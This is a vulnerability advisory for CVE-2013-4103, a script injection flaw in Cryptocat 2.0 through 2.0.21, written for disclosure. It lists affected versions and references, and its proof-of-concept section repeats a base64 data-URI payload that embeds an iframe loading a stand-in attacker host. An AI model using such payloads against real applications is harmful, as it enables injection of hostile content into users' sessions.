Cryptocat CVE-2013-4103 Arbitrary Script Injection Vulnerability
BID:61093
CVE-2013-4103 |Info
Cryptocat CVE-2013-4103 Arbitrary Script Injection Vulnerability
| Bugtraq ID: | 61093 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-4103 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 07 2012 12:00AM |
| Updated: | Nov 07 2012 12:00AM |
| Credit: | Mario Heiderich, Krzysztof Kotowicz and Maxim Rupp |
| Vulnerable: |
Cryptocat Project Cryptocat 2.0.21 Cryptocat Project Cryptocat 2.0.20 Cryptocat Project Cryptocat 2.0.12 Cryptocat Project Cryptocat 2.0.11 Cryptocat Project Cryptocat 2.0.10 Cryptocat Project Cryptocat 2.0.1 Cryptocat Project Cryptocat 2.0 Cryptocat Project Cryptocat 2.0 |
| Not Vulnerable: |
Cryptocat Project Cryptocat 2.0.22 |
Exploit / POC
Cryptocat CVE-2013-4103 Arbitrary Script Injection Vulnerability
Attackers can exploit this issue with a web browser.
The following example URI is available:
Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg
Attackers can exploit this issue with a web browser.
The following example URI is available:
Http://example.come/data:image/foo;base64,PGh0bWw+PGlmcmFtZSBzcmM9Imh0dHA6Ly9ldmlsLmNvbS8iPjwvaWZyYW1lPjwvaHRtbD4NCg
Solution / Fix
Cryptocat CVE-2013-4103 Arbitrary Script Injection Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Cryptocat CVE-2013-4103 Arbitrary Script Injection Vulnerability
References:
References:
- Cryptocat Changelog (Cryptocat)
- Cryptocat Homepage (Cryptocat)
- Cure53 Public Pentest Report: Cryptocat 2 (Dr.-Ing. Mario Heiderich, Krzysztof Kotowicz & Maxim Rupp )
- Security Update: A Follow-up (Cryptocat)
- Security Update: Our First Full Audit (Cryptocat)